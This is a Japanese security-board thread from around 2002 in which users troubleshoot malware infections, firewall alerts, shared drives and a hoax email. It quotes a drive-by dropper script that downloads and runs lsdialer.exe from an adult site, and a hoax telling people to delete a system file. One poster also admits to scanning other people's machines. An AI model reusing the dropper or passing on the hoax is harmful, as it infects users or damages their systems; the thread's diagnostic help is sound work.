感染したままネットに繋ぐ精神状態が理解できないけど

>>564
もうやっちゃったの？つーか感染したままでネット
する事自体100%ヤバイ事なんですが。

かぶった。ごめそ。

＞５６５、５６６
いえ一度感染しましたが駆除しました。
でも感染時にクレジットカ−ドを使用したような
気がするのです（不確かですが）。

>>568
キーログを送信しちゃうからヤバイよ
心配ならクレジットカード会社に連絡を

毎度〜お騒がせの〜464で〜ございま〜す。
件のウィルスですが、ノートン先生の12/29更新版ではひっかからないようです。
Fix_BADTのログをコピペしてみましたが、カーネルおじさんが何か関係あるんでしょうか？

================================================================
Start : FIX_BADTRANS version 1.10
Windows Platform : Windows ME
Tool configuration:
Scan Files: Yes
Quiet Mode: Yes
Date and Time: Mon Dec 31 00:42:12 2001

I. Terminating Worm/Virus processes.
*** Infected processes were NOT found. ***

II. Cleaning System Registry.
WORM_BADTRANS.B not found in the SYSTEM REGISTRY

III. Removing drop files.
File "C:\WINDOWS\SYSTEM\kernel32.exe" not found
File "C:\WINDOWS\SYSTEM\kdll.dll" not found
File "C:\WINDOWS\SYSTEM\cp_25389.nls" not found

IV. Inoculating the system.
Creating [KERNEL32.EXE]. Folder created.
System Inoculated

Stop
Date and Time: Mon Dec 31 00:42:16 2001
================================================================

あと、Wininits.LGCは

何度かWininits.exeを実行
→JustSystem（ATOKなど）の.exeを実行
→最後にKERNEL32.exe

というふうになっていました。
このファイルがどんどん付け足していくタイプのものなら、
KERNEL32が原因（→Fix_Badtで駆除すればOK）ということなのでしょうが・・・
ご意見をお願いします。

>>570
そのログ見るかぎり、
「どこにもBadtrans.bはありませんでした」
と書いてあるようにしか思えないのだが…？

Badtrans.b に感染したマシンを狙った
単独実行ファイルか別種のウイルスじゃないか？

>>412
ノートンにしたです。

２００２体験版をＤＬして、インストしたのですが、
黒氷があるから、インストできません、って出ます。
体験版をＤＬしたら、〜exe.ファイルしかないです。
これって、黒氷入っているうちは、ウイルスバスター２００２は、
インストできないということでしょうか？
何かやりようがあるのでしょうか？

>>574
そのままやん

BlackICE試用版を昨日から使ってるんですが、teri鯖にアクセスすると
何故かIPとリモホが正確に抜かれHTTP　attackと表示されます。
そして「【侵入の疑い】不審なトラフィックが検出されました」とメッセージが。
あの鯖には何かあるのでしょうか？

>>576
そういうのはBlackICEスレで、HTTP attack で検索してみてくれ。

>>577
概要 　侵入の可能性があります。

詳細 　侵入者は、特殊な方法でデータ パケットを構成し、
　　　　　攻撃したシステム上で不正なコードを実行しようとしています。

不思議なのはteri鯖にアクセスすると必ずそうなる事です。
あの鯖のスレを読み込む時に覗かれてるのかと思って。

BlackICEスレで検索してみます。どうもでした。

>>541だけど。
また来た。166.114.65.***
BOLNET（？）のやつから。

NetBIOSにアクセスしてくる部外者ってなに？

>>555
近隣の住人に晒されたくなければ入れろ

ちょっと質問させてください
環境はOS　W2Kとウィルスバスター２００２とルータでネットをやってます。
数日前より同じIPがファイアウォールのログにのるようになりました。
で調べてみるとドライブC&Dが知らぬ間に共有されてるではないですか！
こういうのを防ぐにはどうしたらいいですかね？

>>582
回線切ってウイルスチェック。

いや、ウイルスチェックはやったけど問題なし。
もちろん最新のパターンファイルね
今もがんがん来てるんですけど・・・

>>584
自分以外がPC使わないで知らぬ間に共有されてるとしたら
ウイルスにやられたかハックされたかじゃないか？

>>582

スパイウェアはウイルスチェックは無意味。
あきらめてフォーマットしなさい

ウイルスチェックをだますウイルスがあるし、
ウイルスチェックやったからって万全ではなし。
最良の方法はフォーマットだよふぉー・ま・っと

なんか怪しげなサイト行ったり怪しげなファイル実行したりした覚えはないのか？

>>582
どういう手順で共有しない設定をしたの？

うさくさいとこにはよくいきますが、変なEXEを実行したりとかはないなぁ
あ、ad-awareも使ってみました、異常なしでした

>>590
ウサクサイところ言ったなら可能性はある。
だから心配ならフォーマットしなさい。

＊＊＊＊終わり＊＊＊＊

じゃあうさんくさい所に行った時になんか仕込まれたと。

>>590
てめぇウザイ。
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと

何回も言わせるな！

共有はドライブのプロパティーで見たら共有するになってた。
うさんくさいところていってもなぁ

>>594
Windows2000はデフォルトで共有設定になるのだが

フォーマットって何？

だから心配ならフォーマットリカバリーで解決です。
ワカリマシタカ？アナタニホンジンデスカ？

>>594
ナライナイヨ！それはシステムの共有だろ

煽りはさておき、共有はしないにかえてもまた共有するになってた

なんかね、今月すごいのくるってどっかのＨＰでみた。
ＩＥ６にしないといけないのかな？
ＳＰじゃだめらしい。
情報きぼんむ

５８２はインポ

>>599
それはwindows2000の仕様

ここで勉強↓
http://homepage2.nifty.com/winfaq/w2k/

>>599

あっそー良かったね。共有でいいじゃん。

ほんと５８２は馬鹿

ん〜とりあえずセキュリティーのサイトいって勉強してくる
レス下さった方ありがとう

[スタート]−[ファイル名を指定して実行] から regedit を起動します。
HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services \LanmanServer \Parameters を開きます。
[編集]−[新規]−[DWORD 値] をクリックし、AutoShareServer を作成します。
(AutoShareServer は Server 以上で有効です。NT Workstation や Windows 2000/XP Professional では AutoShareWks を作成します。)
AutoShareServer または AutoShareWks のデータを 0 に設定します。

>602　本当だ・・・しらなかった
今再起動したら、共有するに変わってるや
皆様すいませんです
あとadminにもパスかけ忘れてた・・・

すみません、Win板でも訊いたんですが板違いだったようなので
こちらで質問させていただきます。マルチすまそ・・・。
ポート1025が常にListenになっているんですが、これはWindowsのシステム
かなんかが開けているんでしょうか？ちょくちょくnetstat -aで
確認してるんですが、どこかと接続していた事はないです。

ずっとListenになってるだけのようなんですが・・blackjackという
ウィルスの仕業なんでしょうか？シマンテックとトレンドマイクロの
オンラインスキャンをしてみましたが、何も出ませんでした。
OSはWin98(2、3日前にリカバリしたばかりです)、ZAを入れています。どなたか教えてください・・。

>>608
エプソンのプリンタドライバ入ってるだろ？

>>609
レスありがとうございます。プリンタは持ってないんですが・・
エプソンのプリンタが使うポートなんですか・・周辺機器というと
NTTのTAくらいしか思い浮かばないです・・。

SAgent2がそのドライバ。エプソンにも確認済み。
プリンタ管理ユーティリティだとさ。
・・・・バグについてはデンワのオネェさん教えてくんなかった。
不安なら削除しても動くらしいけど、インク残量とか表示できなくなるって。。。

げっ、プリンタ無しか。。。

またきた。いつも同じような時間帯。

166.114.65.***

だれかわかる人説明ｷﾎﾞﾝﾇ

>>613
知ってどうする？
生兵法は怪我の元。
防いでくれてるなら安心して忘れとけ。

２ちゃんねるの特定の板に書き込むことが出来ないです・・・。
クッキーをオンにして・・・とかいわれてもcookie有効になってるし。

何をどうしたら書きこめるようになるんでしょうか？

>>464
どっかの掲示板からのコピペですが

WininitsはWindows起動時に動作して、起動するごとにファイルを一種類ずつ削除する。
.log→.txt→.na2→.snm→.wab→.wa~→.dbx→.htm→html→.gif→.jpg→.avi→.mov
→.ani→.cur→.ico→.lnk→.doc→.xls→.ttf→.ttc→.fon→.ini→.exe→.dll

駆逐するためには
レジスリHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\wininits
を削除して、
c:\windows\Wininits.exe
を削除。

…らしいです。
放っておいたら途中アドレスもメール送受信のフォルダも消えるってこと？怖。

>616
ありがとうございます。
Wininits自体が削除していたんですね・・・
もうフォーマットしてしまうつもりだったんですが、早速直してみます。
.htmまで消えてなくて良かった・・・
ひたすら感謝です。


>572
わざわざ目を通していただいてありがとうございました。

>617
思ってたほどかわいいものじゃなかったみたい。
画像鑑定スレの非公式BBSでそこそこ深刻な話題になってました。
http://isweb34.infoseek.co.jp/diary/narrowb/cgi-bin/ahh255b2/
ここの雑談スレッドだったかと。

http://dreamisland.mens.cc/sup01/sup01007/images/
の中にあるdatファイルと0ｋのjpegファイルってぶらくらですか？
どなたか教えてください。

>>619　みんなに踏ませたいのか？ソース見て判断しろよ。

ここで紹介されている
ぴんぐってなんですか？

http://mypage.naver.co.jp/sharp2601/

619です。
datファイルをおとしたのですが、
動画がみれず、再起動してみてくださいとでたので・・・
ちなみにウイルスソフトにはひっかかりませんでした。

>617
見てきました。
自分もWininits削除してみたらおかしくなったので再構築中ですが、
やはりフォーマットするしかないですか・・・（泣）
シマンテックは何やってるんだろう？

とりあえず、今のところワクチンソフトがないみたいなので
「Start and Stop」でWininitsを起動させないのがベストみたいですね。
メモ帳のアイコンが変化していたら即止め安定かと。

初めて書き込みをさせてもらいます。
ｉアプリで通信を行うときはJava独自の暗号化を行って
更にSSLで通信の暗号化を強化させるという話を聞いた事あるのです
が、Java独自の暗号化というのはSSLとは違うという事ですよね？
Java独自の暗号化について詳しい方いませんか？
ご存知の方、よろしくお願いします。

間違えてIP晒してしまったら，トロイを仕掛けたと言われました
ウィルス対策ソフト持ってません
どうしたらいいんでしょう！！！

>>626
どこで晒してしまったの？
場所にもよるから、晒した場所と
あなたのＯＳがわからないと
コメントのしようがないよ。

>>626
対策ソフト買ってこいよ
PC買ってから今まで何やってたんだ？

社内LANのパケットを除いている馬鹿がいたので、LAN内部の通信も全面的に
暗号化されることになりました｡
で、Apach-SSL自前CAを立てたんですが、CAの証明書を全マシンに入れるのも
CA使わずにサーバーの証明書を全マシン入れるのもセキュリティー的には
社内LANレベルではあまり変わらないですよね？

ＯＳはＷＩＮ９８、晒した場所はモー狼板
http://love.2ch.net/test/read.cgi/morningcoffee/1010091944/
の２１７

じゃなくて２７１だった！

さっさと答えれ

>>632
どの質問に？

>>630
対策ソフトは買いに行ったか？
早く行け

板違いかもしれませんが詳しい人がいると思いますので
いろいろなホームページ等で登録とかをするときクッキーをonにしてるのに
「認証に失敗しました」とか「クッキーをonにしてください」とかでるのは
なぜでしょうか？登録とか掲示板の書き込みができないときがあるんです！
教えてください　初心者ですいません。
windows me ノートン2001入れてます（関係ないかも）

>>635
私も同じ環境でしたが、たまにそういう現象がありました。
現在はウィルスバスター2002にアップしているせいか、そういった
現象にはお目にかかっていません。

JS_EXCEPTION.GENに感染しました。
検索エンジンで検索してみたところ
IEのスタートページが書き換えられる・・・との事ですが、
スタートページは無事だったんですが
自分の場合、メーラーのアカウント情報が消えていました（EdMaxフリー版）。

ウィルスバスター2002でファイルを見つけ削除→Ad-awareで怪しい物無し→
再度バスターで検索→ウィルス0でした。

もう安心して良いのでしょうか？初めて感染したのでめちゃくちゃ怖いです。
自分より人に迷惑かけたら・・・ほんと不安です・・・・。

環境はWinXP・IE6です。

>626
ﾁﾄ時間がかかるがシマンテックのセキュリティチェック
http://security1.norton.com/ssc/sc_ipcheck.asp?j=1&ax=0&langid=jp&venid=sym&plfid=20&pkj=CYIVSKVYRMHCGVRVRMN

>>637
不安ならフォーマット＞クリーンインストールが基本。

>>608なんですが、どなたか分かりませんか？

netstat -anではこうなります。

Proto　Local Address　　　　 Foreign Address　　　　State
TCP　　127.0.0.1:1025　　　　0.0.0.0:0　　　　　　 LISTENING
UDP　　127.0.0.1:1025　　　　*:*　　　　　　　　　　LISTENING

>>640
オンラインスキャンは気休め。
リカバリは無意味。
>>639

>464
「Start and Stop」とは何処にあるんでしょう？googleで探せなかったんですが・・・

>>71
アドバイス、サンクス

友達に俺のところにhappytimeっていうウイルスが来たからお前のとこにも行くと思う
って言われたんですが・・どんなウイルスなんすか？
どう対処すればいいんですか？

>>645
googleで「ウイルス happytime」で検索。
↓
終了

>>629
正直、この手の高度な質問に回答できるﾔｼは
この板にはいません（ｗ
通信技術板のほうがレスつきやすいですよ。

この前２ちゃんねるに貼り付けてあったリンクにいったら「本日あなたが
最初の犠牲者です」と書かれたリンクにあたり、どうやらウイルスに感染したみたい？で
それからどこかのサイトにいく度にダイアログボックスが開かれて「情報が他人に漏れる可能性があります」
と聞いてきます。一度初期化したのですが直りません。ちなみにそのリンクには
IPアドレスが漏れるとか、メールアドレスが漏れるとか書いてあり、明らかに
誰かが悪意を持って仕掛けていたと思われるのですが・・・初期化しても
直らないので明日修理に出すつもりなのですが、わかる方いますか？具体的
な直し方を教えてほしいのですが。初心者なのでどういう仕組みでＩＰが
漏れるのかもわかりません。

>>648
使用OSと「初期化した」の具体的内容を述べよ

>>648
IPアドレスなんていくらでも漏れる
あなたが行くサイトの管理人にはバレバレだ

たぶんUser-Agentが出るサイトに言っただけだろ
JAVAスクリプトでしかけがしてあるサイトとか

>>649さんの内容に答えてくれ
あとウイルス対策ソフトも持たず（知らず）にネットに繋ぐのは問題外
人格を疑われるぞ

windows meで工場の出荷状態にしてリカバリＣＤＲＯＭで初期化したんですが

>>648
そのリンク、ブラウザの下に「ダウンロード中？？％」のような表示が
出るやつか？ 少し前によく張ってあったのは、ただの脅しJavaScript
だったんだけどね。

ダイアログボックスって、書き込みフォームで送信したときに出るやつ
じゃないの？ ブラウザのセキュリティを高にしたらデフォルトで出る。

年末に張ってあって「ダウンロード中」っていう表示が１秒くらい出て
（ADSL８メガ使用）それからどこのサイトにいくにも（Ｙａｈｏｏ・ｎｉｆｔｙ等）
ダイアログが開かれるんです。これってウイルスの仕業じゃないのかな？
こえゆう風に「インターネットで情報を送信する時にその情報をほかのひとから
読み取られる可能性があります。続行しますか？」ではい・いいえの項目が
でるのですが・・・

>>647
かなり住人かぶってるけどね。なんでだろ？

日付: 02/01/04 時刻: 22:27:55
規則「Default Block NetBus Trojan」が *****,NetBus をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは*****,NetBus
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.109.101.133,2668
ﾌﾟﾛｾｽ名は N/A

このサーバ(韓国)らしいのですが、こわいです。
警告がでるたびトラウマになってしまいます。
何か いい方法がないでしょうか?

WinXP＋NIS2002とWin2000＋BIっていう組み合わせなんだけど、
それぞれNISとBIを止めないとファイルの共有ができない。
セキュリティソフト稼働させたままファイルの共有させる方法はどうすればいい？

win98でIE5.5使ってるんですが、立ち上げた時に表示されるページがア
ダルトページになります。IEのメニューから、「ツール」の「オプション」
で何回も設定しなおしても表示されます(PC再起動後)。さらに、検索ボタン
を押してもアダルトページが表示されます。これって治らないんですかね？

>>653
呆れたわヽ(´ー｀)ノ
IEの設定でそう出てくるだけ。気にすんな。

>>655
あ〜。。メインウインドウ開くのら。
ファイアーウォール->インターネットアクセス制御->(右上の)設定、プルダウン。
->トロイの木馬の設定->NetBusトロイの木馬のデフォルト遮断、反転。
（下部の）修正->（上部の）追跡・「この規則をどう使いますか」のチェックボ
ックスをとりあえづ全部OFF。
コレで警告は出なくなると思うけろ。。。

>655
ブロックしてるのだから、気にする事は無い。
また、たとえブロックされていなくても、貴方のマシンにトロイが無ければ大丈夫

>>659
ありがとう。(感激です。
で、相手先を追及するのは困難ですか?
ひんぱんにあるんです。で、韓国語サイトで翻訳してサーバの
管理者にメールだすんですが、さっぱり無回答なのです。

>>655
うっ、、、つか、、、ノｰ�dパソナルファイアウォールは2001なのれすか？？
だとすると>>659のやり方は2002の方なので参考にならないのら。。。
2001ってどうだったっけら？
たしか、「拡張オプション」からフィルタリングルールのカスタマイズできた
と思ったけろ。。

>>660さん ありがとう。(感激です。

>>662さん
2001です。とにかくやってみます。
で、相手先を追及するのはやはり困難ですか?

>661
韓国語で翻訳して送るより、英語で書いた方が良いかも知れない。
ほら、英語を日本語に訳してくれるサービスの翻訳文て、いい加減なのも多いでしょ。

>>664
無駄

下手に追求してさらなる被害の拡大を見る人が多いんだよ(笑)

>>661
そんなに頻繁なら、自分の加入してるISPに事情説明して、交渉代行してもらう手も有るだろうけろ。
ログは、一応出した方が良いのかな。動いてくれるかどうかは解らないのら。。

ぁ〜。。つか、大きな声ぢゃいえないけど、前に自分も面白がって時々スキャン掛けてた事有るのら。
漏れの加入してるISPは、当時何も言ってこなかったにょ〜〜〜
まぁ、所詮漏れはへたれだから、相手は選んでスキャンしたのら（ｗ

>>665さん 今度は英語でやってみます。(韓国に英文って思いもつななかった)

>>666さん 無駄とはどんなに、調査しても解からない ということですか?

ちなみに出てくるページは
ttp://sm.sexhound.comです。

たぶん踏まない方がいいかと。

>>657
lsdialer.exeとかどっかにないか?
msconfigのスタートアップにも有るはずだから、それも消せ。

>>670
多分、、、JS.Exceptionなのら。。。
漏れ、ソース見飽きたから要らないから行かないけろ。

セキュリティ板の方って、なんかデンジャラスそうで．．．．。
でも、こんな初心者への回答も何行もレスしてくれて、ありがとう。
建築板をうろついている女建築士です。建築のことでお困りの際は
セキュリティ板よりって書いてスレ建ててください。勇士達がたくさんいます。
今回はサンキューです。(^.^)

>>673
をを！いい響きだ！！　＞女建築士
こ、今度お茶でもどうれすか〜〜！！
・・・だ、ダメなら現場でドカチンバイトで使って欲しいれすぅ〜〜

それとこれとは別です。やっぱデンジャラス！！

<!--IPT language=JavaScript
var cabpath='http://sm.sexhound.com/lsdialer.cab';
var exepath='http://sm.sexhound.com/lsdialer.exe';

var BName=navigator.appName;
var BVer=parseInt(navigator.appVersion);
function loadit()
{

if(BName=='Microsoft Internet Explorer'&&BVer =2)
{
document.write("<OBJECT WIDTH=1 HEIGHT=1 CLASSID=
\"CLSID:2C38A62E-D257-40e8-8BB7-5624E38FEB0A\" CODEBASE=\""+cabpath+"\" <\/OBJECT ");
}
else
{
document.write("<SCRIPT window.open\(\""+exepath+"\",\"_blank\",\"height=1,width=1\")<\/SCRIPT ");
}

}
loadit();
//--
</SCRI-->
<!--IPT language=JavaScript
<!--
var exit = true;
setInterval("x()",5);
function x(){window.status="All right reserved. Copyright by sm.sexhound.com ... "}
//--
</SCRI-->

>>670
onunloadで書き換えてるのかも。
Windows起動後、コンパネのインターネットセッティングでスタートページ直せばおっけかも。

<!--IPT language=JavaScript
<!--
var exit=true;
function quit()
{
if (confirm('CLICK OK to DOWNLOAD LOLITAS PORN VIDEO !!! '))
{
window.open("http://sm.sexhound.com/lsdialer.exe", "s4sdcd9", "height=450,width=550,scrollbars=no,resizable=no");
}
if(exit)
{

nwa=window.open("http://sm.sexhound.com/index2.html","234s2");
window.focus();
}
}

// --
</SCRI-->

>>671さん,672さん,676さん,677さん、678さん
ありがとうございます。なんとかやってみます。

ふっ、フラレタのら〜〜〜

http://hotel.prosa.dk/~tsj/hardware/dell8100me/WinMeSysInfo.txt

惜しかったね（ё_ё）>>680
解決前に交渉しとけば…セキュ板の評判がた落ち？（ﾜﾗ

結局、ヂャバoffしとかないのまづいのら。。。

2C38A62E---がlsdialer.cabのCLSIDなのら。。>681
という事は、このDELLコンの持ち主TORBENは。。。（ｗ

確証はないが、Microsoft JavaVM経由でWSH ShellObjectインスタンスを生成‥‥とかいう穴らしいので、
IE以外は影響受けないんじゃないか、という話。

>>682
良いのら。。。コレで（ｗ
さすが女建築士。。。簡単に乗らないところがエライ！
ますます萌えたぢょ(ﾎﾟｯ

皆さんありがとうございます！なんとか治りました！
マジでうれしいです。すげー！

lsdialerを削除？

私も６５７さんと同じ症状です。
みなさんの言うとおりにしましたが、直りません。

もう少し詳しくお願い致します。

私も688や657さんと同じ症状です。
私ももう少し詳しくお願いしたいのですが…

ここがかなり参考になりそうです。
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=all_read&no=112138&page=0
頑張ってみます。

新年早々、送信者欄もタイトルも空欄の添付ファイル付メールが届いていました。
『あやしい』って思って見ずに削除したんですが、大丈夫なんでしょうかねぇ・・・。

>>691
新年早々ウイルス対策ソフトも買ってないあなたがあやしいよ

>>692
新年早々笑った。

さっきタスクに入ってたMXを最大化したらなぜかサイズが5分の1ぐらいに縮小されてた。
身に覚えがないしこんなこと初めて。これってトロイかなにかで遠隔操作されてますか？

>>694
これだけ２ちゃん内でも騒がれてるのにMXをやっているあなたが信じられない
遠隔操作でもウイルス繁殖でもなんでもやられてくれ

質問ですが宜しくお願い致します。
ＩＥ６､NIS２００２を使っています。
２チャンネルで或るスレッドを見ようと思い
スレッド１欄を開き、クリックすると開きますよね。
その時、“トロイの木馬”の警告が出たことがあるのですが
そのスレッドには“トロイの木馬”が仕掛けられていた
と言う事ですか？
それと、お気に入りの所に
なんか知らないうちに“カメラ”のようなマークが出ていたのですが
これは何でしょうか？知らないうちにあったので削除しましたが。
ご存知の方おられましたら宜しくお願い致します。

あの・・、ウィンドウズを立ち上げる時、パスワードを入れないと
いけないようにする方法があるって聞いたことがあるんですけど
それと同じように、ソフトにも、パスを求めさせることって
できるのでしょうか？
たとえば、メーラーを起動させるときに、パスワードを入れないと
起動できないとか・・・。
あと、ファイルとか・・。

ちょっとあっち方向の（エロ）とこに行ったら、
XMildとかいうハンバーガーみたいなアイコンのがデスクトップにできて、
削除しても削除しても復活してしまうんです。
「モデムの選択」とかいうウインドウも勝手に出てくるし。
Ｑ２か何かにつなぐのだと思うんですけど・・・
どうしたらいいか教えてください。

しらん

なんかいじくってたら直りました。どもでした。

＞７０１　＞６９９です

>>697
やりかたによっては可能でしょ

>>703
たしかに可能だけど、
>>697 はWin9xっぽいので、
たぶんやっても無駄っぽいな。
抜け道だらけになりそう。

>>704
起動させるのにパスワードが必要な設定の出来るソフトってあるにはあるよね。
いないときにいじられたくないのだったら 、スクリーンセーバーにパスワードを設定して、
離席するときには手動で起動するってのが一番確実かな？

サブアドからの気持ち悪いメールが毎日入ってきます(泣)
相手の特定とかげきますでしょうか？

もっとも、起動時にパスワード入力しないでも入れるような状態だと、
全く無意味だよね(笑)

>>706
げきません。

>>671-672
ちょっとお訊きしたいんですけど、
JS.ExceptionってAVGで検出できる？

>>708
いいレスだ。

>>705>>707
そうそう。離席するときに画面をパスワードロックする
フリーソフトがあるんだけど、それをスタートアップに
入れると見かけ上は、起動時にパスワード入れないと進めない。

けど、SHIFTキー押しながら起動で簡単に回避できるし、だからって
レジストリの Microsoft\Windows\CurrentVersion\run とかに
登録してみても、セーフモード起動でレジストリキー削除で一発。
結局あれだ。Win9xは設計がそのようなことに向いてないのよ。。。

今見ると>>697には
>メーラーを起動させるときに、パスワードを入れないと
>起動できないとか・・・。
…て、書いてあるし。これだけはOEのユーザー管理機能でも
出来たような…。

下のようなﾒｰﾙが来たんですが、
このsulfnbk.exeっていうの消したらヤヴァイすか？


>>お正月早々に申し訳ございませんが、私の友達のパソコンに
>>ウイルスが進入いたしました。
>>
>>アドレスリストに入っている人全員に、自動的に感染してしまうと
>>いう悪質なウィルスです。
>>
>>ウイルスに先にかかった知り合いのアドレスリストに、上記の方のアドレスが
>>あったのでその方も感染しました。
>>
>>ですからみなさんのコンピューターの中に既にウイルスがいます！！！！！
>>
>>（下記はその方の私宛のメールです）
>>十四日間は眠っているのですが、それを過ぎてしまうとハードドライブを
>>壊してしまいます。
>>
>>私もこのメールを受けたときはびっくりしました、そして実際に検索した所、
>>そのファイルがあり下に表示してあるステップに従ってウイルスを駆除しました。

>>
>>本当に申し訳ないんですが、今直ちにウイルスを駆除してください。
>>そしてあなたのアドレスリストにある人は既に感染していますので、
>>このメールをリストにある全員に送っていただけないでしょうか、
>>本当に申し訳ございません。
>>
>>　　１． スタートメニュー　→　検索　→　ファイルやフォルダ
>>　２．検索条件の名前の欄に”sulfnbk.exe”と打つ　−　これがヴィルスの名前
>>　３．探す場所はCドライブであることを確認する
>>　４．検索開始を押す
>>　５．検索結果で見つかったファイルが黒いアイコンであればそれがヴィルス
>>　　　ファイル名が”sulfnbk.exe”であることを確認する　絶対に開かないでく
だ
>>さい！！
>>　６．そのファイルを右クリック　→　「削除」
>>　７．ごみ箱に移してもいいですかというメッセージが出てくる　→　「はい」
>>　８．デスクトップ（一番最初の基本画面、全てのアイコンがある画面）に行って

>>　　　ごみ箱のアイコンを右クリック　→　「ごみ箱を空にする」
>>　９．もしこのヴィルスがあなたのコンピューターから検出されたらあなたの
>>　　　アドレスに入っている人全員にこのメールを送ってください。
>>　　　それがこのヴィルスのシステムです。
>>　10．もし検索でこのヴィルスが検出されなかった場合は「新しい条件」で
>>　　　試して見てください。
>>
>>このメールは、チェーンメールみたいに送って下さい
>>よろしくお願いします

>>713
「sulfnbk.exe　HOAX」でYahoo検索掛けてみ。。
結構外出なデマ。。

新手のチェーンメールやな。

誰か教えれ・・。AVGスレで訊いたほうがいいか・・。

>>714　thx
がいしゅつでしたかｽﾏｿ
ｼﾏﾃｸのｻｲﾄで復元の仕方も書いてありました

そだな。>>716
今AVGユーザーが居らんのかもしれんが。

>>718
あんがと。そうしますです。

>>716
漏れは、取り敢えず持ってない。。>AVG
んだから、解らない。。
すまにょ。。サイトにウイルスデータベース置いてあれば解るんだけど。。
なんか、無いみたい。。

>>717
「sulfnbk.exe」に関するデマメール情報
http://www.ipa.go.jp/security/topics/alert130530.html

消してしまった人はこちら。
http://www.symantec.com/region/jp/sarcj/data/s/sulfnbk.exe.warning.html

会社のパソコンにウィルスメールが来ました。
サーバーで検知されて毒ファイルはすでに削除されていたので、
問題はないのですが（トロイでした。）、
送信元のメールアドレスに心当たりはなく、
送信者名もただ「X」のみとゆう、あやしいものでした。

これって、もしかして故意にウィルスを送りつけられたのでしょうか？
サブジェクトは文字化けしていたので、なんと書いてあったのかわかりません。

セキュリティを考えてないBBSで
一般にIPを公開していないとして
IPを抜く方法はありますか？

>>723
あなたの立場次第では出来ます。

>>723
CGIを勉強すれば？

立場って言うのは管理人って事でしょうか？

またそれを防ぐにはどうすればいいんでしょう？

>>726

ネットにアクセスしない書き込みしない。

−−−−−解決です−−−−

>>726
プロクシを使えばよいと思います。
IPというのは、全く本当に簡単にとれますから。

$REMOTE_HOST = $ENV{'REMOTE_HOST'};
$REMOTE_ADDR = $ENV{'REMOTE_ADDR'};
if ($REMOTE_HOST eq '') { $REMOTE_HOST = $REMOTE_ADDR; }
if ($REMOTE_HOST eq $REMOTE_ADDR) { $REMOTE_HOST = gethostbyaddr(pack('C4',split(/\./,$REMOTE_HOST)),2) || $REMOTE_ADDR; }

この程度です。

たぶん
>>723 の言ってるのは
セキュリティを考慮してないBBSの書き込みから、
管理人でない第三者がIPを抜く方法だと思われ。

ログが丸見えなBBSも中にはあるからね〜（笑

>>726
管理者側からの防御策ってことだったら
Web版に行ったほうが良いんじゃない？

オススメのファイアーウォールはなんですか？
教えてください。
ちなみにうちはブラックアイスです。

>>733
ブラックアイスはファイヤーウォールではございません。

＞734
じゃ、なんですか？

>>735
エコアイスの親戚です

>>722
文字化けしたメールの修復
ttp://www.kanzaki.com/docs/jis-recover.html

>736
ﾊｧ？

録画機能が付いてないノートPCなのに
モニター越しに他人から覗かれる、なんていうウイルスって
あるのでしょうか？
とあるチャットをロムってたら
私の表情の変化をチャットの中の人が
まるでさも見てるかのように発言してるのを見て怖くなりました。
こういうウイルスってあるのでしょうか。

>>739　心理学

>>739
ナノテクノロジーによる極小チップが
あなたの体内に埋め込まれています。
あなたの体温、血圧、心拍数、発汗状態
などが監視されています。

ファイアーウォールを二つ以上かませるのって意味ないですよね？
自慢してる人がいたんですが。
自分はNortonなんですがBlack IceやTinyのTrojan Trapとの併用も
無意味ですか？

同じパソコンにFWを2つ3つ入れても意味ないけど
別のパソコンなら意味ある。
FWとIDSとTrojan Trapの組み合わせは意味ある。

IDSってのはBlackICE Defender for Serverのことですか？
個人のパソコンには必要なし？

第三者中継可能？
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: [email protected]
Message-ID:< [email protected] >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email [email protected]
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to [email protected] ...Thanks
http://www.em5000.com/[email protected]
http://www.em5000.com/[email protected]
-----
mta05-svc.ntlworld.com
<<< 220 [email protected] ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 [email protected]
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 Sender <"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] > Ok
>>> RCPT TO:<[email protected]>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected]
<<< 501 unacceptable mail address

>>744
>IDSってのはBlackICE Defender for Serverのことですか？
for Workstation も IDSよ。。。
IDSというのは「外部からの不正侵入」に的を絞った製品。
ファイヤーウォール機能らしきものが付いてるが、
本来の意味と違ってる。
BlackICEの特有のことについては
専用スレのこのあたり↓を見てくれ（自分はこのスレの670）
http://pc.2ch.net/test/read.cgi/sec/992171869/669-679n

HAPPY00.EXE, HAPPY99.EXE, TROJ_SKA, W32/SKA
に感染しました。A006143.CPYにWORM_SKA.Aというウィルス
にやられてます。ウィルスバスターで発見できるのですが
駆除、隔離、削除ができないし該当のファイルも検索しても探せません。
どうしたらいいのですか？

Win Me と見た！
システムの復元を一度無効にして、再度有効にせよ。
さすれば、そのファイルも消えるだろう。

